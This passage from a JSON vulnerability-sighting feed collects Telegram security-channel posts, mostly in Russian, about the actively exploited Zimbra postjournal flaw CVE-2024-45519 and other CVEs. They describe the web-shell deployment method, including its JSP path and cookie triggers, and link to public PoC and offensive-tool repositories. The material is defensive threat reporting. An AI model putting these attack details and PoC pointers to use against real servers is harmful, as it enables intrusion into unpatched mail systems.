\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0447\u0442\u043e\u0431\u044b \u0432\u0437\u044f\u0442\u044c \u043f\u043e\u0434 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b Ivanti Virtual Traffic Manager (vTM). \u0410\u0442\u0430\u043a\u0438 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 CVE-2024-7593, \u043a\u043e\u0442\u043e\u0440\u0443\u044e Ivanti \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435, \u0438 \u043d\u0430 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u0443\u0436\u0435 \u0438\u043c\u0435\u043b\u0441\u044f PoC.\n\n5. 
VulnCheck\u00a0\u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0432\u0441\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0430 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0430\u044f APT Flax Typhoon \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043d\u0430 \u0434\u043d\u044f\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Raptor Train. \u0418\u0445 \u0447\u0438\u0441\u043b\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u043e - 66!", "creation_timestamp": "2024-09-25T17:30:05.000000Z"}, {"uuid": "581897e9-51fd-4657-91f1-623b35ed08a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/true_secator/6271", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Zimbra postjournal, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0442\u0430\u0440\u0442\u043e\u0432\u0430\u043b\u0430 \u0447\u0435\u0440\u0435\u0437 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC.\n\nCVE-2024-45519 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c 
\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 Zimbra \u0432\u0435\u0440\u0441\u0438\u0439 9.0.0 Patch 41, 10.0.9, 10.1.1 \u0438 8.8.15 Patch 46.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438, \u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0435\u0449\u0435 \u043d\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 NIST (NVD), \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 ProjectDiscovery \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c\u00a0ProjectDiscovery, \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u00a0\u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0438 \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0445, \u0447\u0442\u043e 
\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c SMTP-\u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0441\u043b\u0443\u0436\u0431\u0443 Postjournal.\n\n\u041f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0441\u043b\u0443\u0436\u0431\u0430 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430, \u043d\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0435\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u0437 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430 \u0441\u0435\u0442\u0438.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-45519 \u0431\u044b\u043b\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u044b Proofpoint \u0443\u0436\u0435 28 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f, \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 
\u0442\u043e\u0433\u043e, \u043a\u0430\u043a ProjectDiscovery \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u041f\u0438\u0441\u044c\u043c\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u043e\u0439 \u043f\u043e\u0434 Gmail \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0438\u0441\u044c \u043d\u0430 \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u0432 \u043f\u043e\u043b\u044f\u0445 CC, \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u044b Zimbra \u0438\u0445 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u0430\u043a \u043a\u043e\u043c\u0430\u043d\u0434\u044b. \u0410\u0434\u0440\u0435\u0441\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0441\u0442\u0440\u043e\u043a\u0438 base64, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b sh.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 CC, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u043d\u0430 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 
\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Zimbra \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443: \u00ab/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp\u00bb.\n\n\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0430 \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0435\u0442 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0437\u0430\u0440\u0430\u043d\u0435\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044f cookie JSESSIONID \u0438, \u0435\u0441\u043b\u0438 \u043e\u043d\u043e \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442, \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u043a \u0430\u043d\u0430\u043b\u0438\u0437\u0443 cookie JACTION \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434 Base64.\n\n\u0412\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0430 \u043e\u0441\u043d\u0430\u0449\u0435\u043d\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 exec. 
\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u044b \u043e\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0444\u0430\u0439\u043b \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442\u043d\u043e\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c HarfangLab \u0418\u0432\u0430\u043d \u041a\u0432\u044f\u0442\u043a\u043e\u0432\u0441\u043a\u0438 \u0432\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a \u0442\u0430\u043a\u0436\u0435\u00a0\u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u043b \u043e\u0431 IP, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u043b\u0438\u0441\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45519.\n\nProofpoint \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043a\u0430\u043a \u043f\u0438\u0441\u0435\u043c \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c\u0438, \u0442\u0430\u043a \u0438 
\u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u0442\u0430\u043f\u0430, \u043d\u043e \u043f\u043e\u043a\u0430 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0438 \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0441 \u043a\u0430\u043a\u0438\u043c-\u043b\u0438\u0431\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u043e\u043c \u0443\u0433\u0440\u043e\u0437.\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Synacor \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0432\u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 postjournal, \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0442\u0447, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e. 
\n\n\u0414\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c Zimbra, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e, \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0434\u0432\u043e\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 postjournal \u043c\u043e\u0436\u043d\u043e \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u043a\u0430\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u043c\u0435\u0440\u0443 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.", "creation_timestamp": "2024-10-02T12:24:36.000000Z"}, {"uuid": "82940bad-130e-40cd-8064-c1dbc248b1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7519", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - 
CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "5d4b28b4-0f93-432d-8a2c-5dcee9b9c11f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Revolution/24", "content": "\ud83c\udccf  CVE-2024-45519 is a vulnerability in Zimbra Collaboration (ZCS) that allows unauthenticated users to execute commands through the postjournal service. This guide walks you through setting up a lab environment to reproduce the issue and execute the exploit. 
\ud83c\udccf \n\nhttps://github.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2024-10-05T11:50:39.000000Z"}, {"uuid": "f812860e-ad60-4ef1-931c-57fb064f835e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6268", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c \u0441 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u0432\u043a\u0440\u0430\u0442\u0446\u0435 \u043f\u043e \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u043c \u043d\u0430 \u043d\u0435\u0434\u0435\u043b\u0435 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:\n\n1. \u0424\u0440\u0430\u043d\u0446\u0443\u0437\u0441\u043a\u0430\u044f LEXFO \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0447\u0440\u0435\u0437\u0432\u044b\u0447\u0430\u0439\u043d\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 JupiterX WordPress \u0438 WooCommerce. 
\n\n\u042d\u0442\u043e \u043e\u0431\u0445\u043e\u0434 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 RCE, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0430\u0439\u0442\u044b.\n\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0444\u043e\u0440\u043c\u0443 \u0441 \u043f\u043e\u043b\u0435\u043c \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u0430.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c JupiterX \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043e\u0441\u044c\u043c\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0445 \u043d\u0430 \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u0435 ThemeForest \u0441 \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c 178 000 \u043f\u0440\u043e\u0434\u0430\u0436.\n\n2. 
VideoLAN \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043c\u0435\u0434\u0438\u0430\u043f\u043b\u0435\u0435\u0440\u0430 VLC \u0434\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043f\u043e\u0442\u043e\u043a MMS.\n\n3. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Project Discovery \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b Zimbra, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-45519 \u0438 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0443 PostJournal, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f 
\u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\u0445.\n\nZimbra \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438 \u0437\u0430 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044c.\n\n4. \u00a0\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u041f\u0430\u0442\u0440\u0438\u043a \u041a\u043e\u0432\u0430\u043b\u044c\u0441\u043a\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f iOS Screen Time. \n\n\u041e\u0448\u0438\u0431\u043a\u0443 \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f Screen Time \u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0438.\n\n5. 
